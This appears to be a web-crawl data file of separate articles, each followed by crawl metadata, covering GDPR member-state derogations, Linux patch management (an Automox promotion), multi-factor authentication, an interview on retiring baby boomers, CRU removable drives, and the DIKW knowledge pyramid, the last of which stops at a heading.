One of the primary goals of the General Data Protection Regulation (GDPR) is to harmonize data protection laws across the European Union (EU). However, under the GDPR, EU Member States are allowed some flexibility to add or modify certain provisions of the GDPR to fit their local needs and laws. In total, there are over 50 provisions, which allow GDPR derogations by Member States.
Locating the GDPR Derogations
These GDPR derogations and exemptions exist primarily in two main areas — Article 23 and Articles 85-91.
Article 23 – Restrictions
Article 23 allows Member States to introduce measures restricting certain obligations and rights in specific situations: for instance, transparency obligations and data subject rights may be restricted in the interest of national security, the prevention and detection of crime, freedom of expression, professional secrecy, the processing of employee data, and other situations. But this GDPR derogation is permitted only where it “respects the essence of the fundamental rights and freedoms and is a necessary and proportionate measure in a democratic society to safeguard” these interests.
Articles 85-91 – Provisions relating to specific processing situations
Articles 85-91 include a variety of GDPR derogations, exemptions and powers for Member States to impose additional requirements on various specific types of processing activities, such as:
Processing for journalistic, academic, artistic or literary purposes (Article 85);
Processing of personal data in official documents held by public bodies (Article 86);
Processing of national identification numbers (Article 87);
Processing in the employment context (Article 88);
Processing for archiving, scientific, historical research or statistical purposes (Article 89); and
Processing in the context of churches and religious associations (Article 91).
Other GDPR Derogations
Other areas where Member States have the option to deviate from, or supplement, the default rules set out in the GDPR include:
Adding rules regarding processing based on the legal bases of “necessary for compliance with a legal obligation” and “necessary for the performance of a task carried out in the public interest or in the exercise of official authority vested in the controller” (Article 6(2));
Lowering the age of consent in relation to the provision of information society services from 16 years to as low as 13 years (Article 8(1));
Prohibiting the use of explicit consent of data subjects as a legal basis for processing special categories of personal data (Article 9(2));
Adding further conditions or limitations on the processing of genetic, biometric or health-related data (Article 9(4));
Requiring controllers to consult with and obtain prior authorization from supervisory authorities when processing is for the performance of a task carried out by the controller in the public interest (including processing in relation to social protection and public health) (Article 36(5));
Requiring controllers and/or processors to designate a data protection officer (DPO) in specific additional circumstances (Article 37(4));
Setting limits on international data transfers, in the absence of an adequacy decision, and where important for reasons of public interest (Article 49(5));
Granting additional powers to supervisory authorities (Article 58(6)); and
Making rules on whether and to what extent administrative fines may be imposed on public authorities and bodies (Article 83(7)).
In addition to these optional GDPR derogations, there are also specific provisions which require Member States to take action to supplement the GDPR, such as:
Providing by law for the establishment, structure and organization of supervisory authorities (Article 54);
Making rules on other penalties for infringements, in particular for those not already subject to administrative fines (Article 84(1));
Reconciling data protection rights under the GDPR with the right to freedom of expression and information, including processing for journalistic, academic, artistic and literary purposes (Article 85); and
Providing for exemptions or derogations from Chapters II-VII and IX, with respect to processing carried out for journalistic, academic, artistic or literary purposes, if they are necessary to reconcile data protection rights with freedom of expression and information (Article 85(2)).
To better understand these GDPR derogations, let’s examine the new laws enacted in Germany and Austria.
GDPR Derogations in Member State Legislation
Germany was the first EU Member State to enact a law designed to supplement the GDPR. The law itself will repeal the current Federal Data Protection Law in Germany, and includes an Amendment Act designed to supplement the GDPR.
The new law contains comprehensive rules on the processing of employee data and further specifies the GDPR’s requirement that consent be voluntary. It also allows for the processing of special categories of personal data in the employment context where such processing is required to exercise rights or comply with obligations under employment law, social law or social protection law, so long as there is no overriding interest of data subjects.
Further, under Article 4(11) of the GDPR, one of the requirements for consent to be valid is that it be freely given, and due to the unbalanced nature of the employment relationship, it is unclear whether consent can be freely given in this context. Under the new German law, however, consent may be considered freely given in the employment context in certain circumstances. For example, when the employee achieves some legal or economic advantage, or if the employer and the employee have the same interests.
The law also expands upon Article 6 of the GDPR by allowing for personal data to be processed for additional purposes that are incompatible with the original purpose, if it “is necessary to assert, pursue, or defend civil law claims” of the controller, so long as it is not overridden by the interests of data subjects. The law goes further in restricting data subject rights as well. For example, data controllers will not be required to fulfill a right of access request if the personal data is stored only for compliance with statutory or contractual retention obligations, or solely for the purpose of data security and data protection control. The right of erasure (“right to be forgotten”) is also restricted if erasure of the personal data would require an unreasonably high effort due to the specific type of storage.
The law also takes advantage of the flexibility found in Article 37(4) of the GDPR given to Member States to specify instances in which controllers and/or processors must designate a data protection officer (DPO). Specifically, the GDPR derogations require controllers to designate a DPO in the following circumstances:
When at least ten employees of a controller or processor regularly conduct automated processing of personal data;
When engaged in high-risk activities mandating a data protection impact assessment (DPIA) under Article 35 of the GDPR; or
When engaged in the processing of personal data on a commercial basis for the purposes of market or opinion research.
The law also includes criminal sanctions and increased prison sentences (up to three years) for violations of certain provisions. For example, for intentionally transferring or making available a large number of personal data, without authorization, to third parties with intent to make a profit.
Austria is the second country to enact a national law to supplement the GDPR. However, unlike Germany, Austria’s law takes a more limited approach to GDPR derogations.
The new law lowers the age at which a minor can consent to the processing of their personal data in relation to information society services without parental consent to 14 years old. The default set by the GDPR is age 16, but leeway is given to Member States to lower this to as low as 13.
It is yet to be seen how this will affect data controllers, but it is likely to present a challenge for the providers of these information society services in multiple Member States if they have different age limits to comply with. For instance, Germany opted not to change the age of consent; therefore, the default age of 16 set by the GDPR will apply. However, many other countries have proposed GDPR derogations to lower the age, including Finland, who proposed lowering the age to either 13 or 15; Ireland, to 13; and the UK to 13.
Another interesting area to note about the Austrian law is that it applies not only to natural persons (like the GDPR and other privacy laws), but to legal persons as well — a wording found in Austria’s constitutional right to data protection. This provision of the law is in direct contradiction with the GDPR, which applies only to the processing of personal data of natural persons. Therefore, this could potentially make for an interesting conflict of laws.
The law also provides that personal data relating to criminal convictions and offences may be processed on the legal basis of legitimate interests of the controller. This is significant given that Article 10 of the GDPR limits the processing of this category of data to instances where “under the control of official authority,” unless authorized by Member State law such as this. Controllers who use CCTV systems to monitor their facilities or who operate whistleblowing hotlines will thus be able to process this data in the legitimate interests of security. It will be interesting to see whether other Member States follow suit in exercising this GDPR derogation, as lobbying efforts to fill gaps like this are expected.
How to prepare for GDPR derogations
Organizations should take the following steps to prepare for applicable GDPR derogations implemented by Member States:
1. Identify Requirements
The first step is to determine which EU Member State jurisdictions are applicable to your organization’s processing activities. Therefore, it will be critical to have a solid understanding of your data — what types of personal data is collected (e.g., special categories), where the data is located, and where data subjects reside. Work already done on Article 30 data mapping initiatives will be incredibly useful here, as the information detailed in those records can be leveraged for these purposes.
2. Fill Gaps
After identifying what EU Member State laws apply, you can then begin a gap analysis to understand what work you need to do to update your various policies, procedures and business processes to ensure compliance with those applicable laws. In some areas, such as age of consent for processing related to information society services, standardization will not be possible due to the GDPR derogations, and thus flexibility in how personal data is processed will be needed, i.e., how you process a German data subject’s personal data may need to be different from how you process the personal data of an Austrian data subject.
3. Keep Things Current
So far, only two Member States have enacted laws to supplement the GDPR, but the others are close behind with their own GDPR derogations. It is also inevitable that amendments to these laws will take place. Therefore, it will be imperative to keep track of these changes, and ensure that your policies, procedures and business processes are flexible to change. | <urn:uuid:a49ce310-1af7-4d17-a073-c5d7f7efb021> | CC-MAIN-2022-40 | https://www.cpomagazine.com/data-protection/gdpr-derogations-prepare-member-state-variation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00561.warc.gz | en | 0.91758 | 2,236 | 2.640625 | 3 |
As an open-source operating system (OS), Linux, which has grown to roughly 20 million lines of source code, not surprisingly requires a significant and ongoing number of patches.
Linux needs a lot of patches
As an open-source platform, the majority of the work is performed by the Linux community, encompassing thousands of programmers from around the world.
While this level of collaboration reaps amazing benefits, it also results in even more patching issues than usual.
Linux: A very brief history
Linux traces its roots back to 1964 and the development of Multics by M.I.T., GE, and Bell Labs (AT&T). When Bell labs pulled out in 1969, two employees, Ken Thompson and Dennis Ritchie, created Unix.
Through the coming years, Unix spawned Berkeley Software Distribution, the GNU Project, and MINIX. Each had its own limitations and restrictions which led Linus Torvalds to create Linux in 1991, sending his now famous message to the minix newsgroup on Usenet.
In the 25+ years since, Linux has evolved dramatically and many well-known companies such as Dell, Hewlett Packard, and IBM all invest in and profit from Linux by validating and selling Linux on their own servers. Other companies, including RedHat, Ubuntu, and SUSE manage their own enterprise distributions.
It is easy to see how quickly Linux patching can become complicated depending on who you are using to support your Linux servers.
Everyone know how complicated Windows patching is and the headaches created by WSUS, and that is a single company. Linux, with its plethora of options, presents patching complications all its own.
Linux patching complications
While Microsoft has the edge in patching support, patching Linux has historically had very few third-party options to manage patches.
You could handle them manually (not recommended) by visiting your vendor (RedHat, SUSE, etc…) site, downloading the package, run the package manager and related scripts and commands, and hope you don’t run into additional requirements. If you don’t have unlimited time and resources, another option is to use the built in updating processes, but they are typically inefficient and become more difficult when you have other dependencies or scheduling requirements.
Looking at third-party options, even as recently as a couple of years ago, centralizing Linux patch management meant you had to use configuration management systems like Puppet or Chef.
While these solutions technically work, they tend to be overly complex solutions for patching.
Most SysAdmins don’t have the programming experience, let alone the time required to create the programs necessary to efficiently patch a scalable Linux network.
How to simplify Linux patch management
Finally, there is a simple, straightforward solution for Linux patching that not only handles Linux, but also works with Windows and Mac.
Automox’s cloud-based SaaS has made Linux patching manageable whether you have one Linux server or one thousand.
Our revolutionary platform automatically identifies devices that have fallen out of patch compliance and applies required patches – with no effort on your part.
Broad Linux support along with a constant cycle of policy-based evaluation and remediation sets Automox apart. By simply adding the Automox OS Agent to your Linux endpoints you will instantly generate a full inventory view along with a complete list of deployed software.
Automox for Easy IT Operations
Automox is the cloud-native IT operations platform for modern organizations. It makes it easy to keep every endpoint automatically configured, patched, and secured – anywhere in the world. With the push of a button, IT admins can fix critical vulnerabilities faster, slash cost and complexity, and win back hours in their day.
Grab your free trial of Automox and join thousands of companies transforming IT operations into a strategic business driver. | <urn:uuid:73dc937b-2ee8-4fa7-ac83-fc936e5b448f> | CC-MAIN-2022-40 | https://www.automox.com/blog/linux-patching-made-easy | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00561.warc.gz | en | 0.935731 | 790 | 2.890625 | 3 |
Multi-Factor Authentication

By the GridinSoft Team
Multi-Factor Authentication (MFA) is an identity verification method that requires the user to provide two or more verification factors to access a resource, such as an application, an Internet account, or a VPN. MFA is a core component of a strict Identity and Access Management (IAM) policy. The primary goal of MFA is to create a layered defense that prevents an unauthorized person from accessing a target, such as a physical location, computing device, network, or database. Even if one factor is compromised, an attacker still has at least one more barrier to overcome before successfully penetrating the target.
Why is MFA used?
One of the most significant disadvantages of a traditional login with a user ID and password is that passwords can be easily compromised, costing organizations millions of dollars. Brute-force attacks are also a real threat: attackers use automated tools that try different combinations of usernames and passwords until they find the correct one. Even if the targeted system locks an account after several incorrect login attempts, hackers still have many other ways to get in. This is why multi-factor authentication is so important: it can help reduce these security risks.
How Does MFA work?
In a classic scheme, users enter their username and password when they log into an account. With multi-factor authentication, the system then prompts them to verify their identity, usually offering several options. These might include a one-time password (OTP) sent via SMS or generated by an authenticator app, or a prompt to provide biometric information such as a fingerprint or facial scan. Some corporate organizations may require users to authenticate with a physical token, such as a key fob or reader card. Many corporate MFA solutions also support adaptive authentication, which makes it easier for users to access critical systems without compromising account security.
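As an illustration of the OTP generation mentioned above, here is a minimal sketch of the time-based one-time password (TOTP) algorithm that most authenticator apps implement (RFC 6238). The base32 secret and the six-digit/30-second parameters are the common defaults, not a requirement:

```python
import base64
import hmac
import struct
import time

def totp(secret_b32, for_time=None, digits=6, step=30):
    """Time-based one-time password (RFC 6238): HMAC-SHA1 over the current time window."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time() if for_time is None else for_time) // step
    digest = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation (RFC 4226)
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)
```

Both the app and the server derive the same code from a shared secret and the clock, so no code ever travels over the network ahead of time.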
What are the types of MFA?
In general, MFA authentication methods fall into three categories; every other methodology is based on one of these three types:
Things you know (knowledge)
Knowledge-based authentication usually requires the user to answer a personal security question. Knowledge-factor techniques typically include passwords, four-digit personal identification numbers (PINs), and one-time passwords (OTPs). Typical user scenarios include the following:
- Reading a debit card and entering the PIN at the checkout counter at the grocery store;
- Downloading a VPN client with a valid digital certificate and logging into a VPN before gaining access to the network;
- Providing information, such as the mother's maiden name or previous address, to gain access to the system.
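The most common knowledge factor, the password, is typically verified server-side against a salted hash rather than stored in plain text. The sketch below uses PBKDF2 from Python's standard library; the function names and iteration count are illustrative choices, not a prescribed standard:

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None, iterations=200_000):
    """Store only (salt, digest); the plaintext password is never kept."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def check_password(password, salt, stored_digest, iterations=200_000):
    """Recompute the hash and compare in constant time to resist timing attacks."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, stored_digest)
```

Even with slow hashing, a knowledge factor alone remains phishable, which is exactly why MFA layers other factor types on top of it.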
Things you have (possession)
To log in, the user must carry something specific, such as a badge, token, key fob, or SIM card. For mobile authentication, a smartphone often provides the possession factor in combination with an OTP application. Possession-factor technologies include:
- Security tokens are small hardware devices that store a user's personal information and are used to identify that person electronically. The device can be a smart card, a chip embedded in an object, such as a USB drive, or a wireless tag.
- A software security-token application generates a one-time PIN for login. Software tokens are often used for mobile multi-factor authentication, where the device, such as a smartphone, provides the possession factor.
- Typical possession-factor scenarios include mobile authentication, where users receive a code on their smartphone to gain or grant access. Options include text messages and phone calls sent to the user as an out-of-band method, smartphone OTP applications, SIM cards, and smart cards with stored authentication data. It may also involve connecting a hardware USB token that generates OTPs to a desktop and using it to log into a VPN client.
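Hardware key fobs of the kind listed above commonly implement the counter-based HOTP scheme (RFC 4226): the fob and the server share a secret and an event counter that advances on every button press. A minimal sketch, using the RFC's own test secret purely for illustration:

```python
import hmac
import struct

def hotp(secret, counter, digits=6):
    """Counter-based OTP (RFC 4226), the scheme behind many hardware key fobs."""
    digest = hmac.new(secret, struct.pack(">Q", counter), "sha1").digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)
```

Unlike TOTP, HOTP needs no synchronized clock, only a counter that both sides keep roughly in step.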
Things you are (inherence)
This can be any biological trait of the user confirmed at login. Inherence-factor technologies include the following biometric verification methods:
- Retinal or iris scans;
- Fingerprint scanning;
- Voice authentication;
- Face recognition;
- Hand geometry;
- Digital signature scanners;
- Earlobe geometry.
The components of a biometric device include a reader, a database, and software that converts the scanned biometric data into digital form and compares matching points between the observed data and the stored data. Typical inherence-factor scenarios include the following:
- Using fingerprint or facial recognition to access a smartphone;
- Providing EDS at a retail cash register;
- Identifying a perpetrator by earlobe geometry.
Other Types of Multi-Factor Authentication
Another variety of MFA is adaptive authentication, also called risk-based authentication. Adaptive authentication analyzes additional factors, taking into account context and login behavior, and often uses these values to determine the level of risk associated with a login attempt. For example:
- Where was the attempted access to information made?
- When was the access attempt made? (e.g., during working hours or after hours)
- What device is being used? (e.g., the usual one or a different one)
- Is the connection through a private network or a public network?
Based on the answers to these questions, a risk level is calculated, and the system decides whether the user will be asked for an additional authentication factor or allowed to log in. With adaptive authentication, a user logging in from the office at the start of the workday only needs to enter a username and password. However, a user who logs in from a coffee shop late at night, which is not typical, may also need to enter a code sent by text message to their phone.
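The risk calculation described above can be sketched as a simple scoring policy. The signals, weights, and step-up threshold below are illustrative assumptions, not any real product's policy:

```python
def risk_score(ip_on_corp_network, during_work_hours, known_device):
    """Sum simple risk points; each unusual signal makes the login attempt riskier."""
    score = 0
    if not ip_on_corp_network:
        score += 2   # public networks carry more risk than the corporate network
    if not during_work_hours:
        score += 1
    if not known_device:
        score += 2
    return score

def required_factors(score, step_up_threshold=2):
    """Password alone for low-risk attempts; demand an extra factor above the threshold."""
    return ["password"] if score < step_up_threshold else ["password", "otp"]
```

Real adaptive systems weigh far more signals (geolocation, velocity, device fingerprint), but the step-up decision follows the same shape.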
Difference between MFA and Two-Factor Authentication (2FA)
MFA is often equated with two-factor authentication (2FA). They are similar, but 2FA is a subset of MFA: 2FA limits the required factors to exactly two, whereas MFA can use two or more. MFA is the broader practice, accepting several possible ways to authenticate the user, and is thus more relevant to enterprise-scale cybersecurity solutions. Two-factor authentication is generally easier to set up and maintain, since you do not need to support every possible authentication method, and it is widely used in individual users' security setups.
What are the pros and cons of MFA?
Multi-factor authentication was introduced to increase the security of access to systems and applications through software and hardware. The goal was to verify users' identities and guarantee the integrity of their digital transactions. The downside is that users often forget the answers to the security questions that verify their identity, and some users share personal identifiers and passwords. MFA has both advantages and disadvantages.

Advantages:
- Adds additional layers of security at the hardware, software, and personal identification levels;
- Can use one-time passwords sent to phones that are randomly generated in real-time and difficult for hackers to crack;
- Can reduce security breaches by up to 99.9% compared to passwords alone;
- Users can easily customize it;
- Allows businesses to restrict access based on specific characteristics, such as time of day or location;
- It is scalable in cost, as there are both expensive and complex MFA tools and more affordable ones for small businesses.
Disadvantages:

- Requires a phone to receive text message codes;
- Hardware tokens can be lost or stolen;
- Phones can also be lost or stolen;
- Biometric matching for personal identifiers, such as fingerprints, is not always accurate and can produce false positive or false negative results;
- MFA checks may fail in the absence of the Internet;
- MFA methods must be continually improved to protect against criminals who work tirelessly to hack them.
The future of MFA: AI, ML, and more
Multi-factor authentication is constantly evolving, providing more secure access for organizations, though sometimes at the cost of convenience for users. Biometrics, again, is an optimal solution: it is safer because a fingerprint or face is difficult to forge, and the user doesn't have to remember anything (such as a password) or make any other effort. Here are some of the advances shaping multi-factor authentication today.
Artificial Intelligence (AI) and Machine Learning (ML). AI and ML can be used to recognize behavior, indicating whether a given access request is "normal" and therefore requires no additional authentication (or, conversely, to identify abnormal behavior). In particular, this is currently done with the help of user behavior analytics (UBA).
Fast Identity Online (FIDO). FIDO authentication is based on the FIDO Alliance's set of free and open standards. It allows password-based login to be replaced with fast, secure sign-in to websites and applications.
Passwordless authentication. Instead of using a password as the primary method of identity verification and supplementing it with other non-password methods, passwordless authentication eliminates passwords as a form of authentication altogether.
Rest assured that multi-factor authentication will continue to change and improve, finding ways for people to verify their identity reliably and without jumping through hoops.
Frequently Asked Questions
SSO, or Single Sign-On, is a login mechanism in which the user signs into a single trusted account. After that, they can use all the sites and services linked to that account without logging in again. SSO is used across service suites such as those from Google and Microsoft.
Meanwhile, MFA is about asking for several identity confirmations before letting the user in. It also concerns the login process, but it assumes much less trust and fits better in places where the login cannot be implicitly trusted. Still, the two can be combined: first you log in with MFA, then you use all related services through SSO.
Demographic issues are in the air. IBM recently announced plans to train 10,000 new mainframe workers by 2010, the year boomers born in 1945 turn 65. Encouraging people to work beyond retirement age will be necessary to prop up declining labour force levels, according to a 2005 Conference Board of Canada study. IBM also launched a new consulting area to help organizations deal with the impending loss of experienced older workers. Is the situation as dire as it appears? To get some perspective on the matter, ComputerWorld Canada Senior Writer Rosie Lombardi spoke with the man who wrote the book — literally — on demographics: David Foot, author of Boom, Bust and Echo.
What kind of demographic shifts are we going to see in the near future?
In Canada, the first baby boomers were born in 1947, and they’ll reach age 65 in 2012. Some boomers in certain occupations can retire before 65. So we have a few front-end boomers, primarily in the public sector, beginning to retire now and trickling out from public service, teaching, civil service, military and some unionized jobs.
So how big a problem will retiring boomers be for Canada?
Not a problem at all. The peak of the baby boom was 1960 [in Canada]. Those people are only 45 today, so by 2010, they’re 50. There’s still another 15 years before they retire. This idea that boomers will retire en masse, I don’t know where it cropped up. The baby boom was 20 years long, and it’s going to take 20 years for them all to retire. There’s also another issue here: we’re going to have a labour market surplus, not simply because boomers aren’t retiring, but their kids, the echo boomers, are coming into the workforce. We’ve got exploding college and university enrollment now, and they’re graduating. At the front end, the echo boomers born in the 1980s are now 25.
Is IBM misguided in offering training and services to deal with retiring workers?
I really don’t mind them thinking that way, because it means we’re going to see an investment in apprenticeship programs, which we badly need. There’s no doubt in certain occupations, we will have a labour market shortage. In a lot of skilled trades, we abandoned our apprenticeship programs in the early 1980s. But this has nothing to do with retiring boomers. Yes, there will be some attrition of experienced people out of select occupations, but it’s not a massive exodus. [The problem] is that we haven’t been planning the inflow, and not that the outflow is [leaving]. The retiring workers are a catalyst to deal with a long-standing problem.
Are there generational differences due to the technology environment people grew up in?
No. It’s purely the points of their lives [that defines them]. Back when I was in my twenties, I was a brilliant Fortran programmer. I haven’t lost those technology skills, but they’re irrelevant today. And that happens to everybody. You’re at the frontier of technology in your twenties, and round about age 30, you get more responsibilities at work and start a family. There’s nothing like a kid and a mortgage to get you focused. When the boomers were in their twenties, they were perceived as disloyal, and there’s nothing different in today’s generation. They want to [travel], get experience, move up fast — they’re acting just like the boomers did. Those in their thirties now, they’re the people in the 1990s who were part of the big technology boom, they were never going to settle down. Today they want to work for big organizations like IBM. They need stability now that they have kids and mortgages. People act their age — there’s little difference in attitudes or aspirations.
Do you have any advice on the best way to manage the outflow of older workers?
For boomers, you might want to have some type of phased retirement policy. There are a lot of people after age 50-55 who would love to spend every weekend with their grandkids. Why not have them work four days a week for 80 per cent of salary? They want to play golf. Why not have them work nine months of the year at 75 per cent salary? So we need some sort of phased retirement where we proportionately reduce work load and salary. That’s the way to keep the experience around, but begin to save on their salaries. We also need some way to deal with the pension issues, and we’re not confronting that at all. If you can take the 55-year-olds and send them on special assignments for three days a week, you’ve created an opportunity for [younger workers]. Bringing them into management positions now is a great idea. [They can] work with people who are leaving the position, but who are still around to mentor them. | <urn:uuid:26b9ae89-2f93-450b-b256-65552c02975d> | CC-MAIN-2022-40 | https://www.itworldcanada.com/article/retiring-boomers-alter-job-landscape/14395 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00561.warc.gz | en | 0.969392 | 1,064 | 2.609375 | 3 |
Removable Drives, Data Transport, and Data Security
CRU has a long history of providing removable drives around the world to government and military agencies, businesses of all sizes, digital cinema, educational institutions–the list goes on. Removable drives are a very cost-effective and safe way to manage data for transport, security, backup, growing big data sets, and archiving.
Organizations use removable drives for:
- Transporting data. Moving data via removable drive is a proven, high-speed method for all kinds of applications. After all, FedEx/your favorite shipper is always more efficient than the internet. Thank you, xkcd.
- Implementing a reliable backup strategy. The best way to safeguard your data is to make multiple copies, and store some of those copies at a separate, safe offsite location.
- To improve data security. If you have highly sensitive data, removing disks nightly and moving them to a secure facility/SCIF, safe, or room improves data security and is often part of a removable drive workflow.
- For fast disaster recovery. Moving copies of data offsite helps organizations and businesses recover quickly in the event of a disaster. This helps mitigate business downtime after an unfortunate event, or anytime data is lost.
- Many need to move large datasets to different offices, locations, or for client delivery. Using an encrypted disk carrier, like the DataPort 10 Secure 256-bit, is a safe way to accomplish this.
- Portable work environment. If you have a large amount of data, or unique operating environment, it’s often easier to pull a removable drive from one workstation and go to another to easily have the same computing environment as you want.
- For backup, archiving or long-term data storage. Using removable drives in a disk-to-disk backup and archiving strategy lets you easily save data by project or job, keep track of expanding data sets, or restore data if need be.
- Boot into a unique operating system/environment image. Yes, many people are content to do this with virtual machines, but if you’re tracking down a nasty virus or bit of malware, or need a guaranteed clean OS and applications environment, it’s straightforward to keep separate environments on separate removable drives and maintain high-performance data communications.
Removable Drives Anatomy
Removable hard drives use “drive carriers” that house SSDs, 2.5-inch hard drives, and 3.5-inch hard drives. CRU drive carriers are made of metal for ruggedness and durability, though there are a few plastic models we made for particular customer use cases. CRU drive carriers are rigorously designed to provide high-speed 6G communication between the drive and the computer/host it is used with. Drive carriers protect drives as well as provide the ability to hot swap drives without powering down the host computer or opening the case.
The drive carriers are inserted into/removed from “receiving frames” that are installed into host devices such as workstations and other computers, not to mention purpose-built devices such as aircraft and military vehicles, video surveillance recorders, ATMs, point-of-sale terminals, and so on.
CRU designs the frames and carriers in tandem so they meet the shock, vibration, data integrity, regulatory, and other requirements our customers demand.
External Hard Drives
Sometimes people use the term removable drive to refer to external hard drives, which we call hard drive enclosures, since we believe in the ability to grow data sets and use your preferred storage media, so we focus on designing high-quality enclosures and leave the drive media to others.
How Do Removable Drives Work?
The removable drive system works like this: install a disk or SSD into a rugged drive carrier, and then into a frame in a computer/host (or if using a CRU TrayFree™ system, directly into the drive enclosure). Remove the drive/carrier as needed for transport, security, drive rotation, when full, or when your workflow calls for it. A common implementation of this system uses a frame or enclosure that encrypts data for the ultimate in information security. CRU® offers several product options to securely encrypt your data; learn more about encryption here.
Popular CRU Removable Drives
With its DataPort® and Data Express® product lines, CRU has for decades been the dominant supplier of removable drives to well-known computer manufacturers and integrators, government and military agencies, and other industries.
The CRU DataPort® product line includes the industry standard DataPort 10 and DataPort 25 rugged removable carriers and frames, as well as the compact and efficient DataPort 41 for four 2.5-inch drives. Using a removable hard disk storage methodology is necessary to implement a sound business backup and data protection strategy because it is a practical way to move your data–in the form of hard disks–from place to place, including offsite locations. This data portability is important for the 3-2-1 Backup Rule.
Removable Drives and the Cloud
Clearly, removable drives fit well into workflows that include cloud-based storage or applications. They’re the basis of a foolproof onsite backup methodology, as well as offer a way to quickly seed a cloud environment.
According to Forbes, more than half of U.S. businesses are using cloud applications, including cloud backup services. Following the aforementioned 3-2-1 backup rule means having more than just the cloud to back up data. In fact, storing data in the cloud may not be a sound data practice for many clients, depending on the sensitivity of their data and how dependent they are on fast access to such data. Aside from security, privacy, and access concerns, the cloud also may not be the safe haven for data that some would have you believe.
According to the Symantec report, “Avoiding the Hidden Costs of the Cloud“:
- 47% of enterprises lost data in the cloud and had to restore their information from backups
- 37% of SMBs have lost data in the cloud and had to restore their information from backups
- 66% of those organizations saw recovery operations fail
These statistics reinforce why CRU recommends using a removable disk strategy for data transport, security, backup, and IT flexibility. | <urn:uuid:ffac4c0c-3843-49ff-8c06-f7293258d34d> | CC-MAIN-2022-40 | https://www.cru-inc.com/data-protection-topics/removabledrives/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00761.warc.gz | en | 0.932894 | 1,312 | 2.546875 | 3 |
Under the Service Transition Segment of ITIL Knowledge Management, the DIKW model is a fundamental concept. When we accumulate raw data, it comes in a topsy-turvy manner. DIKW pyramid explains how the data can be refined and transformed into Information, Knowledge, and Wisdom with a constituent of actions and decisions.
Prologue to DIKW Pyramid:
Under the Service Transition division of ITIL Knowledge Management, the DIKW model is a critical component. The DIKW pyramid is seen from experience as a method of researching, communicating, connecting, and reflecting. Data, information, knowledge, and wisdom, are depicted as four distinct layers in the DIKW Model (Data-Information-Knowledge-Wisdom). Data is the base foundation of the pyramid, then the next layer is Information, the third layer is knowledge, and the fourth layer is wisdom, the apex. DIKW model is widely used in Information Science and Knowledge Management-ISKM. Theoreticians widely use DIKW Model in library and Information Science.
Data is the base of the hierarchy: unrefined, unorganized external input such as figures or characters that have not yet been interpreted. Without a framework, data means little. For example, 25012012 is a series of numbers without manifest importance; viewed in the framework of a date, however, we can easily identify it as 25th January 2012. Adding context to the numbers adds value.
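The date example above can be reproduced in a couple of lines: the same digit string becomes information once a day-month-year framework is applied to it.

```python
from datetime import datetime

raw = "25012012"  # bare digits: data without context
# Applying a framework (day-month-year) turns the data into information.
parsed = datetime.strptime(raw, "%d%m%Y").date()
print(parsed)  # 2012-01-25
```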
Information is the second building block of the DIKW hierarchy. Here the data has been cleansed of errors and processed in a way that makes it easy to evaluate, visualize, and examine for a specific purpose. Crucially, information management does more than answer queries; it also helps establish organizational context.
Depending on the purpose, information processing entails different actions, such as aggregation and validation, to ensure the accumulated data is relevant and accurate. For instance, we can arrange information so that it reveals links between apparently different and unconnected data points. More concretely, we can examine the Dow Jones index's performance by plotting its closing value each day over a given time span.
We extract valuable information from data by asking the questions "Who," "What," "When," and "Where." It is the question "How" that elevates information to knowledge.
Knowledge is the third phase of the DIKW model, representing a collection of validated, meaningful information. This phase answers the "How" questions: How is the information obtained from the accumulated data relevant to our goals? How do the pieces of information connect to one another to add meaning and value? And how can we apply this knowledge to accomplish our goal?
Knowledge is commonly the edge that organizations hold over their competitors. As we uncover the relationships within our information, we gain deeper insights that take us higher up the DIKW pyramid. When we use the knowledge and insights gained from information to make decisions, we have reached the final phase of the DIKW model: wisdom.
Wisdom is the highest level of the DIKW hierarchy, and it answers the questions "Why do something?" and "What is best?" In other words, wisdom is intelligence in action. Knowledge and wisdom link the present to the future in achieving goals.
As the final phase of the hierarchy, wisdom is the means of reaching the desired end result: it takes the output of all preceding levels of the DIKW model and applies it through distinctly human judgment, such as moral and ethical codes.
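To make the four layers concrete, here is a minimal sketch of the climb from data to wisdom. The readings and the decision rule are invented purely for illustration:

```python
# Data: raw, unvalidated readings (some are junk).
raw = ["72", "75", "err", "74", "310", "73"]

# Information: validated and contextualized (temperatures in Fahrenheit).
info = [int(x) for x in raw if x.isdigit() and 0 < int(x) < 150]

# Knowledge: a relationship extracted from the information.
avg = sum(info) / len(info)

# Wisdom: a decision applying the knowledge to a goal.
action = "alert facilities" if avg > 80 else "no action needed"
print(round(avg, 1), action)
```

Each step discards noise and adds context, which is exactly the refinement the pyramid describes.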
How Businesses and Organizations Progress Through the Knowledge Model:
Employing semantic technologies such as linked data and semantic graph databases is a quick way for businesses and organizations to progress through the DIKW model from data to information to knowledge to wisdom. These technologies establish links between diverse, heterogeneous data and infer new knowledge from existing facts. With this insight, businesses can ascend to the wisdom level and gain a competitive advantage by using data-driven analytics to guide their decisions.
DIKW Model in ITSM:
